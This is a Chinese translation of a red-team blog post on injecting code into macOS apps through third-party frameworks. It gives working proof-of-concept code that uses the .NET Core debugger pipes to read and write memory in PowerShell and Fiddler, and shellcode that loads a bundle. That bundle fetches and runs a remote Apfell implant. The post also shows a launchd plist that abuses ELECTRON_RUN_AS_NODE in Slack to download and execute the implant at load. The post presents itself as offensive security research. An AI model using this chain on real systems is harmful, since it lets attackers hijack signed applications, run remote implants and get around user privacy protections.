通过第三方框架注入macOS

阅读量399339

|

发布时间 : 2020-09-25 15:30:35

x
译文声明

本文是翻译文章,文章原作者 trustedsec,文章来源:trustedsec.com

原文地址:https://www.trustedsec.com/blog/macos-injection-via-third-party-frameworks/

译文仅供参考,具体内容表达以及含义原文为准。

 

自从加入TrustedSec AETR团队以来,我花了一些时间研究MacOS环境下的攻击技术。不幸的是对我们这些攻击者来说,对于macOS系统的攻击是越来越难的。苹果公司通过隐私保护、沙箱和一层套一层的权限关系,使得通过注入方式操控macOS系统成为了几乎不可能的事情。

苹果花费大量精力阻止了通过进程注入进行post-exploitation。过去,我们可以在一个目标进程上调用task_for_pid,以此来获取它的Mach端口,然后调用mach_vm_ dance来分配和读写内存。时至今日,这些API的调用受到了严格的限制,只允许root用户调用这些函数。当然,这也意味着只要二进制文件没有hardened runtime标志时,它就不是带有Apple签名的二进制文件,这样它们甚至可以阻止root用户查看他们在内存中的文件。

在这篇文章中,我们将看到利用第三方框架实现代码注入的几种有趣的方法。对我们来说,这意味着在目标应用程序中运行代码,而不关闭macOS系统的系统完整性保护(System Integrity Protection ,SIP)。

提示:这篇文章中展示的两种技术都不是MacOS特有的,它们在Linux和Windows系统上都能很好地工作。但由于苹果对进程注入的严格限制,这篇文章主要关注它们对MacOS的影响。

让我们从一种我们都很熟悉的.NET Core框架开始。

 

.NET CORE框架

微软的.NET Core框架是一种流行的跨平台应用和软件开发工具包(SDK),它是我们最喜欢的.NET应用开发平台之一。跨平台版本的PowerShell 就是由.NET Core框架支撑的,而在这篇文章中,PowerShell将作为我们的初始测试平台来使用。

为了展示我们在MacOS上向进程进行注入时的复杂程度,我们先通过传统方式对APItask_for_pid进行注入。一个简单的注入方法如下:

kern_return_t kret; 
mach_port_t task; 

kret = task_for_pid(mach_task_self(), atoi(argv[1]), &task); 
if (kret!=KERN_SUCCESS) 
{ 
    printf("task_for_pid() failed: %s!\n",mach_error_string(kret)); 
} else { 
    printf("task_for_pid() succeeded\n"); 
}

当在我们的目标系统中运行PowerShell进程时,我们收到了预料之中的错误提示:

未能检索到PowerShell的任务端口

但是如果我们以root用户身份运行呢?我们尝试运行一个没有hardened runtime标志的应用程序,它可以正常运行:

使用root用户成功运行PowerShell

但是当我们开始尝试通过一个使用了hardened runtime标志的应用程序进行此操作,我们就会看到同样熟悉的错误提示:

即便是root用户也不能打开PowerShell

如果我们使用类似LLDB的工具,它拥有com.apple.security.cs.debugger的强大权限,会发生什么呢?使用一个非root用户可以成功访问一个没有hardened runtime标志的进程,但是与此同时我们也会收到一个警告用户的对话框:

弹出请求权限的对话框

同样,即使我们以root身份运行LLDB,我们也不能调试带有hardened runtime标志的进程:

root用户下运行调试器也无法调试带有`hardened runtime`标志的进程

总之,这意味着只有当我们是root用户时,才可以注入到没有hardened runtime标志签名的.NET Core进程中。

没有一个很好的漏洞可以使用的话,苹果的API对我们来说毫无用处。我们怎么才能控制我们的目标:.NET Core进程呢?要做到这一点,我们应该仔细看看运行时源代码,它可以从这里获得。

 

对.NET CORE的调试

让我们从头开始,尝试理解像Visual Studio Code这样的调试器是如何与.NET Core进程交互的。

我们看一下dbgtransportsession.cpp中的.NET Core源代码,这个部分负责调试通信,我们可以看到在函数DbgTransportSession::Init中创建了一系列命名管道。

这些管道在MacOS(和Unix)的情况下是使用以下代码创建的先进先出(FIFO)管道:

if (mkfifo(m_inPipeName, S_IRWXU) == -1) 
{ 
    return false; 
} 
unlink(m_outPipeName); 
if (mkfifo(m_outPipeName, S_IRWXU) == -1) 
{ 
    unlink(m_inPipeName); 
    return false; 
}

要查看实际操作,我们可以启动PowerShell。通过PowerShell可以看到在当前用户的$TMPDIR中创建了两个命名管道,管道名附加了PID,并在最后备注了inout

.NET Core创建命名管道进行调试

了解了命名管道的位置和用途后,我们如何与目标进程通信呢?这个问题的答案在DbgTransportSession::TransportWorker方法中,它处理来自调试器的传入连接。

通读这些代码后,我们看到调试器需要做的第一件事是创建一个新的调试会话:通过out管道发送一个以MessageHeader结构开头的消息,我们可以从.NET源代码看到创建过程:

struct MessageHeader 
{ 
    MessageType   m_eType;        // Type of message this is 
    DWORD         m_cbDataBlock;  // Size of data block that immediately follows this header (can be zero) 
    DWORD         m_dwId;         // Message ID assigned by the sender of this message 
    DWORD         m_dwReplyId;    // Message ID that this is a reply to (used by messages such as MT_GetDCB) 
    DWORD         m_dwLastSeenId; // Message ID last seen by sender (receiver can discard up to here from send queue)     DWORD         m_dwReserved;   // Reserved for future expansion (must be initialized to zero and                                             // never read)     union { 
        struct { 
           DWORD         m_dwMajorVersion;   // Protocol version requested/accepted 
           DWORD         m_dwMinorVersion; 
        } VersionInfo; 
         ... 
    } TypeSpecificData; 

    BYTE                    m_sMustBeZero[8]; 
}

在新会话请求的情况下,这个结构体被填充如下:

static const DWORD kCurrentMajorVersion = 2; 
static const DWORD kCurrentMinorVersion = 0; 

// Set the message type (in this case, we're establishing a session) 
sSendHeader.m_eType = MT_SessionRequest; 

// Set the version
sSendHeader.TypeSpecificData.VersionInfo.m_dwMajorVersion = kCurrentMajorVersion;
sSendHeader.TypeSpecificData.VersionInfo.m_dwMinorVersion = kCurrentMinorVersion; 

// Finally set the number of bytes which follow this header 
sSendHeader.m_cbDataBlock = sizeof(SessionRequestData);

构造完成后,我们使用系统调用write发送给目标:

write(wr, &sSendHeader, sizeof(MessageHeader));

随后我们需要发送一个sessionRequestData结构体,它包含一个GUID来识别我们的会话:

// All '9' is a GUID.. right?
memset(&sDataBlock.m_sSessionID, 9, sizeof(SessionRequestData)); 

// Send over the session request data 
write(wr, &sDataBlock, sizeof(SessionRequestData));

在发送我们的会话请求时,我们从out管道中读取一个数值,它将告诉我们是否成功建立调试会话:

read(rd, &sReceiveHeader, sizeof(MessageHeader));

如果一切正常,现在我们已经与目标建立了调试器会话。既然我们可以与目标进程通讯,那么我们可以使用哪些功能呢?如果我们查看运行时公开的消息类型,我们会看到两个有趣的基础类型,MT_ReadMemoryMT_WriteMemory

它们允许我们读写目标进程的内存。我们可以在典型的MacOS API调用之外读写内存,这给了我们进入.NET Core进程内存的一个后门。

让我们从尝试从目标进程中读取一些内存开始。与我们创建会话的步骤一样,我们用:

// We increment this for each request
sSendHeader.m_dwId++; 

// This needs to be set to the ID of our previous response 
sSendHeader.m_dwLastSeenId = sReceiveHeader.m_dwId; 

// Similar to above, this indicates which ID we are responding to 
sSendHeader.m_dwReplyId = sReceiveHeader.m_dwId; 

// The type of request we are making
sSendHeader.m_eType = MT_ReadMemory;

// How many bytes will follow this header
sSendHeader.m_cbDataBlock = 0;

这一次,我们也提供了一个我们想从目标中读取的地址:

// Address to read from
sSendHeader.TypeSpecificData.MemoryAccess.m_pbLeftSideBuffer = (PBYTE)addr; 

// Number of bytes to read
sSendHeader.TypeSpecificData.MemoryAccess.m_cbLeftSideBuffer = len;

让我们测试一下分配一些非托管内存:

[System.Runtime.InteropServices.Marshal]::StringToHGlobalAnsi("HAHA, MacOS be protectin' me!")

我们使用这个代码可以很容易地读取该内存。运行结果如下:

在PowerShell中dump内存

当然,我们反过来使用,使用MT_WriteMemory命令注入到PowerShell中来覆盖内存:
图8向PowerShell注入内存

用于执行此操作的POC代码可以在这里找到。

 

.NET CORE代码执行

我们的重点是将代码注入到PowerShell中,如何将读/写基础类型转换为代码执行呢?我们没有能力改变内存保护,这意味着如果我们想引入shell代码之类的东西,只能写入标记为可写和可执行的内存页。

利用我们的简单POC,让我们标识一个RWX内存页并在那里托管我们的shell代码。苹果限制了我们枚举远程进程地址空间的能力,然而,我们可以访问vmmap(感谢Patrick Wardle,他在这篇文章中展示了这项技术),其中包含许多授权,包括com.apple.system-task-ports,它允许工具访问目标的Mach端口。

如果我们对PowerShell执行vmmap -p [PID],我们看到许多有趣的内存区域适合托管我们的代码,下面重点展示’ rwx/rwx ‘权限:

使用vmmap标识一个RWX内存页

现在我们知道了注入shellcode的地址,我们需要找到一个可以写入的地方来执行这段代码。函数指针在这里是一个理想的候选对象,并且不需要花费很长时间就可以找到许多。我们使用的方法是覆盖动态函数表(DFT)中的指针,它被.NET Core runtime运行时使用。功能是为JIT编译提供帮助函数。在jithelper .h中可以找到函数指针列表。

找到一个指向DFT的指针是很简单的,特别是我们使用了mimikatz-esque工具的签名搜索技术在libcorclr.dll中搜索_hlpDynamicFuncTable的引用,然后我们解除它的引用:

_hlpDynamicFuncTable的引用

接下来要做的就是找到一个开始搜索签名的地址。为此,我们利用另一个公开的调试器函数MT_GetDCB。它会返回许多关于目标进程的有用信息,其中包含helper函数m_helperRemoteStartAddr的地址。使用这个地址,我们就知道了libcorclr.dll在目标进程内存中的位置,然后我们就可以开始搜索DFT了。

现在我们已经有了注入和执行代码所需的所有代码块,让我们尝试将一些shellcode写入RWX内存页,并通过DFT传输代码执行。在这种情况下,我们的shellcode将非常简单,只需在PowerShell提示符上显示一条消息,然后返回执行到CLR:

[BITS 64]

section .text 
_start: 
; Avoid running multiple times 
    cmp byte [rel already_run], 1 
    je skip 

; Save our regs 
    push rax 
    push rbx 
    push rcx 
    push rdx 
    push rbp 
    push rsi 
    push rdi 

; Make our write() syscall 
    mov rax, 0x2000004 
    mov rdi, 1 
    lea rsi, [rel msg] 
    mov rdx, msg.len 
    syscall

; Restore our regs 
    pop rdi 
    pop rsi 
    pop rbp 
    pop rdx 
    pop rcx 
    pop rbx 
    pop rax 
    mov byte [rel already_run], 1  

skip: 
; Return execution (patched in later by our loader) 
    mov rax, 0x4141414141414141 
    jmp rax 

msg: db 0xa,0xa,'WHO NEEDS AMSI?? ;) Injection test by @_xpn_',0xa,0xa 
.len: equ $ - msg 
already_run: db 0

这里可以找到用于注入PowerShell的完整POC代码。

 

Hardened Runtime功能是否会阻止代码运行?

现在我们有能力将其注入到.NET Core进程中,一个明显的问题是,hardened runtime功能是否会阻止它的运行。从我所看到的情况来看,是否设置了hardened runtime标志对我们的调试管道没有影响,这意味着我们的注入行为对于带有hardened runtime标志签名的应用程序仍然奏效。

让我们以另一个流行的应用程序为例,它已经签名、公证并带有hardened runtime签名标志,Fiddler:

Fiddler带有带有`hardened runtime`签名标志

在这里我们发现其带有hardened runtime签名标志,但我们可以看到,启动应用程序仍然导致调试管道被成功创建:

命名管道由带有`hardened runtime`签名标志的Fiddler创建

让我们通过尝试向Fiddler中注入一些shellcode来确保一切都能正常工作。这一次,我们将做一些更有用的事情,在Cody Thomas‘ Mythic框架中注入Apfell

有几种方法可以做到这一点,但为了保持过程简单,我们将使用wNSCreateObjectFileImageFromMemory方法从磁盘加载一个bundle:

[BITS 64] 

NSLINKMODULE_OPTION_PRIVATE equ 0x2

section .text 
_start: 
    cmp byte [rel already_run], 1 
    je skip  

; Update our flag so we don't run every time 
    mov byte [rel already_run], 1  

; Store registers for later restore 
    push rax 
    push rbx 
    push rcx 
    push rdx 
    push rbp 
    push rsi 
    push rdi 
    push r8 
    push r9 
    push r10 
    push r11 
    push r12 
    push r13 
    push r14 
    push r15 

    sub rsp, 16 

; call malloc 
    mov rdi, [rel BundleLen] 
    mov rax, [rel malloc] 
    call rax 
    mov qword [rsp], rax  

; open the bundle 
    lea rdi, [rel BundlePath] 
    mov rsi, 0 
    mov rax, 0x2000005 
    syscall  

; read the rest of the bundle into alloc memory 
    mov rsi, qword [rsp] 
    mov rdi, rax 
    mov rdx, [rel BundleLen] 
    mov rax, 0x2000003 
    syscall 

    pop rdi 
    add rsp, 8  

; Then we need to start loading our bundle 
    sub rsp, 16 
    lea rdx, [rsp] 
    mov rsi, [rel BundleLen] 
    mov rax, [rel NSCreateObjectFileImageFromMemory] 
    call rax 

    mov rdi, qword [rsp] 
    lea rsi, [rel symbol] 
    mov rdx, NSLINKMODULE_OPTION_PRIVATE 
    mov rax, [rel NSLinkModule] 
    call rax 

    add rsp, 16 
    lea rsi, [rel symbol] 
    mov rdi, rax 
    mov rax, [rel NSLookupSymbolInModule] 
    call rax 

    mov rdi, rax 
    mov rax, [rel NSAddressOfSymbol] 
    call rax 

; Call our bundle exported function 
    call rax 

; Restore previous registers 
    pop r15 
    pop r14 
    pop r13 
    pop r12 
    pop r11 
    pop r10 
    pop r9 
    pop r8 
    pop rdi 
    pop rsi 
    pop rbp 
    pop rdx 
    pop rcx 
    pop rbx 
    pop rax 

; Return execution 
skip: 
    mov rax, [rel retaddr] 
    jmp rax 

symbol: db '_run',0x0 
already_run: db 0  

; Addresses updated by launcher 
retaddr:                dq 0x4141414141414141
malloc:                 dq 0x4242424242424242
NSCreateObjectFileImageFromMemory: dq 0x4343434343434343
NSLinkModule:           dq 0x4444444444444444
NSLookupSymbolInModule: dq 0x4545454545454545
NSAddressOfSymbol:      dq 0x4646464646464646
BundleLen:              dq 0x4747474747474747

; Path where bundle is stored on disk
BundlePath:             resb 0x20

我们将要加载的包是一个非常简单的JXA执行:

#include <stdio.h>
#include <pthread.h>
#import <Foundation/Foundation.h>
#import <OSAKit/OSAKit.h>

void threadStart(void* param) {
    OSAScript *scriptNAME= [[OSAScript alloc] initWithSource:@"eval(ObjC.unwrap( $.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://127.0.0.1:8111/apfell-4.js')), $.NSUTF8StringEncoding)));" language:[OSALanguage languageForName:@"JavaScript"] ];
    NSDictionary * errorDict = nil;
    NSAppleEventDescriptor * returnDescriptor = [scriptNAME executeAndReturnError: &errorDict];
}

int run(void) {
#ifdef STEAL_THREAD
    threadStart(NULL);
#else
    pthread_t thread;
    pthread_create(&thread, NULL, &threadStart, NULL);
#endif
}

注入Apfell implant的POC代码可以在这里找到。

另外,可以在苹果APP商店找到的Electron框架也可以被注入。

 

Electron框架注入

正如我们现在所知道的,Electron是一个框架,它允许web应用程序移植到桌面,并且它被用于安全存储RAM。

那么,我们如何在一个经过签名和带有hardened runtime标志的应用程序中执行代码呢?我们通过引入环境变量ELECTRON_RUN_AS_NODE

这个环境变量将Electron应用程序转换为常规的旧NodeJS REPL。例如,让我们从App Store中选取一个流行的应用程序,比如Slack,并设置ELECTRON_RUN_AS_NODE环境变量来启动进程:

你会看到它用Visual Studio Code也可以正常工作:

Discord:

甚至BloodHound:

那么,这对我们来说意味着什么呢?在MacOS环境中,这意味着,我们可以很容易地通过执行ELECTRON_RUN_AS_NODE环境变量,让我们的NodeJS代码被执行。

让我们以Slack为例(尽管任何应用程序都可以很好地工作),并利用它对桌面和文档的访问来解决TCC问题。在MacOS中,一个子进程将从父进程继承TCC权限,这意味着我们可以使用NodeJS派生一个子进程,比如Apfell 's implant,它将继承所有用户授予的隐私切换权限。

为了做到这一点,我们先打开Electron:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>EnvironmentVariables</key>
    <dict>
           <key>ELECTRON_RUN_AS_NODE</key>
           <string>true</string>
    </dict>
    <key>Label</key>
    <string>com.xpnsec.hideme</string>
    <key>ProgramArguments</key>
    <array>
        <string>/Applications/Slack.app/Contents/MacOS/Slack</string>
        <string>-e</string>
        <string>const { spawn } = require("child_process"); spawn("osascript", ["-l","JavaScript","-e","eval(ObjC.unwrap($.NSString.alloc.initWithDataEncoding( $.NSData.dataWithContentsOfURL( $.NSURL.URLWithString('http://stagingserver/apfell.js')), $.NSUTF8StringEncoding)));"]);</string>
    </array>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>

然后我们使用ELECTRON_RUN_AS_NODE环境变量,通过OSAScript执行Apfell

launchctl load /tmp/loadme.plist

如果一切顺利,你将被返回一个shell,正如预期的那样:

Mythic框架中的Apfell

通常,当我们请求类似于~/Downloads的内容时,你会期望不显示给用户任何提示。如果你在未经允许的情况下请求访问任何内容,我们可以让合法应用显示一个提示:

图18

显示Apfell请求访问的对话框

以上就是本篇内容,我们通过利用第三方框架公开的功能来绕过MacOS进程注入限制。许多应用程序都暴露在这种注入技术中,考虑到苹果对MacOS生态系统的限制,这令人十分的惊讶。我们希望通过公开这些技术和POC代码,可以帮助红队修复MacOS的漏洞。

本文翻译自trustedsec.com 原文链接。如若转载请注明出处。
分享到:微信
+10赞
收藏
passw0day
分享到:微信

发表评论

内容需知
合作单位
  • 安全客
  • 安全客
Copyright © 北京奇虎科技有限公司 三六零数字安全科技集团有限公司 安全客 All Rights Reserved 京ICP备08010314号-66